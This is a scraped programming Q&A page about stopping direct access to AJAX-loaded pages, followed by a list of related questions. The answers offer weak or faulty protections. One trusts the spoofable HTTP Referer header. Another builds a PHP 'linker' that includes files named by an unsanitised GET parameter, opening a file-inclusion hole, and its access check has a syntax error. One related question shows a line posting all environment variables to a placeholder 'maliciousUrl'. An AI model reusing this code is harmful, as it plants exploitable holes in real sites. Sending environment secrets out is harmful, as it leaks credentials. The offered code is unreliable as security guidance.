prohibit linking directly to AJAX pages within a specific folder

Is there a way to prevent direct access to pages in the AJAX directory while still allowing them to be served from their parent page? I've tried various .htaccess configurations, but they end up blocking access from the main page as well. Essentially, I want to restrict users from accessing , but still have page1.html loaded into its parent page via AJAX.

<LIMIT GET POST>
Order deny, allow
deny from all
</LIMIT>

This configuration blocks all access entirely.

One suggestion is to define a flag in the parent file like define('IS_IN_SCRIPT', 1); and check for it in the AJAX pages. Would this solution work effectively with AJAX pages or is it more suitable for PHP includes?

ajaxsecurity.htaccess

Answer №1

Determining HTTP Referer in PHP

To determine the HTTP Referrer in PHP, you can use the $_SERVER['HTTP_REFERER'] variable and check if it is from your domain or a list of acceptable domains.

If the referrer is not from your domain, you can redirect to another page.

if (!empty($_SERVER['HTTP_REFERER']) && strpos($_SERVER['HTTP_REFERER'], 'yourdomain.com') !== false) 
  { echo 'This request is probably from your own site'; }

Answer №2

If you don't receive a specific parameter through GET or POST in your ajax request, you have the option to redirect the user to another page for further action.

In PHP, the code snippet would appear as follows:

if(!isset($_POST['some_var']))
  header('Location: somePage.html');

Answer №3

$$ zoe_daemon

To access private files from a parent page using AJAX, you will need to create a "linker" file.

/*This linker file allows you to open private files located in the "private" folder from the parent page via AJAX.*/
//begin linker.php
<?php
   $link = $_GET["link"];
   include "../private/$link.php";
?>
//end linker.php

The files within the "private" folder should also have code to prevent direct access if the request URI does not contain the string "private". For example, if you have a file like "login.php" in the "private" folder, you can add this code snippet before any operational code:

//begin login.php
$count = 0;
$test = str_replace("name_of_directory_cannot_directly","dummy_string",$_SERVER['REQUEST_URI'], $count ); //or
if ($count > 0) {
    die "Ooouuuppppsss, you cannot access this file directly");
}
/*
//your code here....
*/
//end login.php

Similar questions

If you have not found the answer to your question or you are interested in this topic, then look at other similar questions below or use the search

JavaScript timekeepers and Ajax polling/scheduling

After looking into various methods like Comet and Long-Polling, I'm searching for a simpler way to push basic ajax updates to the browser. I've come across the idea of using Javascript timers to make Ajax calls at specific intervals. Is this app ...

javascriptajaxtimer

Retrieving data from a separate server using GWT on the client side

My dilemma involves a file called sample.xml residing on one web server, and I need to retrieve this file from a GWT application running on a separate server. Rather than making RPC calls to the GWT server to access the file through server-side proxy, I pr ...

ajaxgwtsame-origin-policy

Customized Error Handling Function for Ajax Requests

I have a function that works perfectly, but I need to add six more buttons without repeating code. I want each callback to be customizable, with different text for each scenario (e.g. displaying "Please Log In" if the user is not an admin). How can I make ...

javascriptjqueryajaxcoffeescript

A guide on enhancing Autocomplete Tag-it plugin with custom tags

Looking to expand the tags in the 'sampleTags' variable within this code snippet $(function () { var sampleTags = ['c++', 'java', 'php', 'coldfusion', 'javascript', 'asp', &apo ...

javascriptjqueryajaxjsontag-it

Executing the Javascript function after the dynamic loading of the table through an ajax request

After the table finishes loading, I would like to trigger a JavaScript function. Originally, I considered using the onload() function on the table, but I discovered that it does not actually work for tables. ...

javascriptajaxangularjs

Utilize jQuery to extract data from a Steam page in JSON format

Although I have researched extensively on this topic, it is still not functioning as desired. I came across this Steam page in JSON format. My aim is to extract the lowest_price variable without using PHP as I am incorporating it into my Chrome extension. ...

jqueryajaxjson

Mixing success and error states can lead to confusion when using jQuery and Express together

I've been struggling with a simple question that's been on my mind for quite some time. Despite my searches, I haven't found a similar query, so I apologize if it seems too basic or repetitive. The scenario involves an API route (Express-ba ...

javascriptjquerynode.jsajaxexpress

The functionality of a generated button has been compromised

My goal is to create a webshop that doesn't rely on MySQL or any database, but instead reads items from JSON and stores them in LocalStorage. However, I've encountered an issue where the functionality of buttons gets lost after using AJAX to gene ...

javascriptjqueryjsonajaxlocal-storage

What could be causing jQuery to overlook dynamically loaded jQuery Mobile buttons?

While working with a web page that uses jQuery Mobile, I utilized Ajax to load the following HTML content. The key detail is the presence of the onButton class attached to the anchor tag. <a class="onButton ui-btn ui-btn-inline ui-btn-corner-all ui-sha ...

jqueryajaxjquery-mobile

Trouble getting PHP and AJAX FormData to communicate with each other

I'm completely baffled! Ajax doesn't seem to be sending the file to PHP, and I can't figure out why. Can anyone make sense of this? Here is the code snippet: ----- HTML ----- <input id="mmSelectedDoc" name="selectedFiles[]" type="file" ...

phpajax

How to transmit data using ajax through a hyperlink? (Without relying on ExtJS, jQuery, or any other similar libraries)

I have a link that says "follow me" and I want to send some basic data to the page without having it reload. Update: I just realized that using "onclick" will help me achieve what I need. Got it. Update 2: I mean, something like this: follow me ...

javascriptajaxhyperlinkxmlhttprequest

featherlight.js - Execute code when modal is triggered

Situation with HTML <div id="form-lightbox"> <div class="form"> <div id="ajaxreplace"> <script type="text/javascript"> jQuery(function() { jQuery.ajaxReplace({ //parame ...

javascriptajaxfeatherlight.js

Issue with Django query not being successfully transferred to AJAX in JSON structure

Trying to populate a textfield with its corresponding database value using Django and AJAX. The objective is for the textfield to automatically update when the dropdown value changes. However, encountering an error in console: SyntaxError: Unexpected to ...

pythonjsondjangoajaxforms

Trouble with AJAX Post Request: Missing JSON Response

Below is the AJAX request I have created: var data = modalDom.find("form").serializeObject(); data["returnJson"] = true; $.ajax({ type: "POST", url: "/companies/edit/", data: data, dataType: "JSON", success: function (result) { ...

javascriptjqueryasp.netajaxasp.net-mvc

Trouble accessing Laravel route using Ajax technology

In my main container (app.blade.php), I have a home.blade file which contains a container that is refreshed with ajax when an item in the sidenav menu is clicked. If you click on one of those items after your session has expired, a middleware should redire ...

ajaxlaravel

Executing an Ajax call to trigger a NodeJS function that executes a bash script

I have created a bash script to generate a JSON file that needs to be parsed and sent to the client-side JavaScript for display. My goal is to achieve this without refreshing the page and without using jQuery. I attempted to use Axios but seem to be facing ...

javascriptjsonnode.jsajaxbash

Is there a way to determine if npm packages are accessing and misusing my system's environment variables?

Apologies if this seems nonsensical. But including a code snippet like this: // to illustrate I'm utilizing a source from https://www.npmjs.com/package/got got.post(maliciousUrl, {json: process.env}) Is it enough to leak environment variables to an u ...

javascriptnode.jssecuritynpm

Enhance the table using Django URL tag along with JQuery

I am currently working on a table that is being populated with user details and I would like to include a Django URL tag within the row, extracting the primary key in the process. Here is an example of what I am trying to achieve: function putTableData(re ...

javascriptjquerydjangoajax

What are the steps to ensure synchronous angular ajax calls?

function SubmitIdeaEvaluation(evaluationForm, ideaId, stageId, isEvaluated) { return $http({ url: SparkApp.FormEvaluation.SubmitIdeaEvaluation, method: "POST", contentType: "application/x-www-form ...

angularjsajax

Wicket - Shifting items between different data views

Using Apache Wicket has presented me with a challenge... In my java class, named "task," I am managing both active and finished tasks. I have successfully implemented a sortable dataView for active tasks: Within this DataView implementation, each ta ...

ajaxwicketrepeatermovedataview